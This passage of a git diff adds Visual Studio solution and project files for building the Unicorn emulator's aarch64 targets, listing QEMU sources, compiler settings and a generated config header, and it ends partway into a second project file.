{F8053D66-8267-433A-BF2C-E07E2298C338}.Release|Win32.ActiveCfg = Release|Win32 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Release|Win32.Build.0 = Release|Win32 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Release|x64.ActiveCfg = Release|x64 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Release|x64.Build.0 = Release|x64 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Debug|Win32.ActiveCfg = Debug|Win32 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Debug|Win32.Build.0 = Debug|Win32 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Debug|x64.ActiveCfg = Debug|x64 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Debug|x64.Build.0 = Debug|x64 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Release|Win32.ActiveCfg = Release|Win32 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Release|Win32.Build.0 = Release|Win32 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Release|x64.ActiveCfg = Release|x64 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Release|x64.Build.0 = Release|x64 + 
{F113B460-4B21-4014-9A15-D472FAA9E3F9}.Debug|Win32.ActiveCfg = Debug|Win32 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Debug|Win32.Build.0 = Debug|Win32 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Debug|x64.ActiveCfg = Debug|x64 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Debug|x64.Build.0 = Debug|x64 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Release|Win32.ActiveCfg = Release|Win32 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Release|Win32.Build.0 = Release|Win32 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Release|x64.ActiveCfg = Release|x64 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Release|x64.Build.0 = Release|x64 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Debug|Win32.ActiveCfg = Debug|Win32 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Debug|Win32.Build.0 = Debug|Win32 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Debug|x64.ActiveCfg = Debug|x64 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Debug|x64.Build.0 = Debug|x64 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Release|Win32.ActiveCfg = Release|Win32 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Release|Win32.Build.0 = Release|Win32 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Release|x64.ActiveCfg = Release|x64 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Release|x64.Build.0 = Release|x64 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Debug|Win32.ActiveCfg = Debug|Win32 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Debug|Win32.Build.0 = Debug|Win32 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Debug|x64.ActiveCfg = Debug|x64 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Debug|x64.Build.0 = Debug|x64 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Release|Win32.ActiveCfg = Release|Win32 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Release|Win32.Build.0 = Release|Win32 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Release|x64.ActiveCfg = Release|x64 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Release|x64.Build.0 = Release|x64 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Debug|Win32.ActiveCfg = Debug|Win32 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Debug|Win32.Build.0 = Debug|Win32 + 
{1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Debug|x64.ActiveCfg = Debug|x64 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Debug|x64.Build.0 = Debug|x64 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Release|Win32.ActiveCfg = Release|Win32 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Release|Win32.Build.0 = Release|Win32 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Release|x64.ActiveCfg = Release|x64 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(NestedProjects) = preSolution + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {740F3007-7BF0-4C0C-8FA5-2587C794EF31} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {2C5AD347-6E34-463B-8289-00578E43B255} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {63050112-E486-4396-B5E4-303C3BC12D39} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {4A9F9353-DB63-460A-BB1C-9CB519DFD414} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {4478909E-6983-425C-9D9F-558CF258E61E} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {006A7908-ABF3-4D18-BC35-0A29E39B95F9} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {698C2D54-475C-446F-B879-F629BBEF75FE} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {8804AD29-E398-480C-AC0F-98EC1B7A51CB} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {17077E86-AE7C-41AF-86ED-2BAC03B019BC} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {340D86A5-E53C-490B-880A-8EB1F5BDE947} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {9D588288-5A28-4AB3-96EA-442CAA508F8E} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {9F32C692-9106-43AF-A291-779A2D8BE096} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {7AA02EDF-D797-494B-929C-F628F4E4EA62} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {11727C54-463F-472A-88AF-6C3D6071BF0B} = 
{F8E85E25-4D67-4A6B-A976-C920790B8798} + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {A25CA34D-2F64-442B-A5D3-B13CB56C9957} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {F8053D66-8267-433A-BF2C-E07E2298C338} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {9D96D09A-DE17-4011-9247-F0009E8D6DB5} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {F113B460-4B21-4014-9A15-D472FAA9E3F9} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {1945F27B-ABB3-47F9-9268-A42F73C8B992} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + EndGlobalSection +EndGlobal diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj new file mode 100644 index 0000000..f9f022a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj @@ -0,0 +1,239 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h" /> + 
<ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper-a64.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\aarch64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper-a64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c" /> + 
<ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate-a64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_aarch64.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{2A7F483F-CD19-4F84-BBDA-B6A1865E2773}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>aarch64softmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + 
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + 
<ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git 
a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj.filters new file mode 100644 index 0000000..8467aec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj.filters @@ -0,0 +1,149 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{8a7d2815-3656-4ae7-8eb2-d38da6e8d480}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{9a7f2b42-3f31-4731-84e2-38f535304a1d}</UniqueIdentifier> + </Filter> + <Filter Include="hw\arm"> + <UniqueIdentifier>{c74d3c4d-1f19-42c6-bf25-26820a53ac11}</UniqueIdentifier> + </Filter> + <Filter Include="target-arm"> + <UniqueIdentifier>{0e231806-86e4-4e05-8ef8-3e3d36860b00}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{ca50b33c-f5ce-4975-a702-c607bb2fc604}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{1db81436-53cf-4cb6-a474-e76327883bd2}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper-a64.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\qemu\target-arm\internals.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + <ClInclude Include="..\..\..\qemu\aarch64.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper-a64.c"> + 
<Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate-a64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_aarch64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/config-target.h new file mode 100644 index 0000000..6c82c70 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/config-target.h @@ -0,0 +1,5 @@ +/* 
Automatically generated by create_config - do not modify */ +#define TARGET_AARCH64 1 +#define TARGET_NAME "aarch64" +#define TARGET_ARM 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj new file mode 100644 index 0000000..41d625f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj @@ -0,0 +1,239 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude 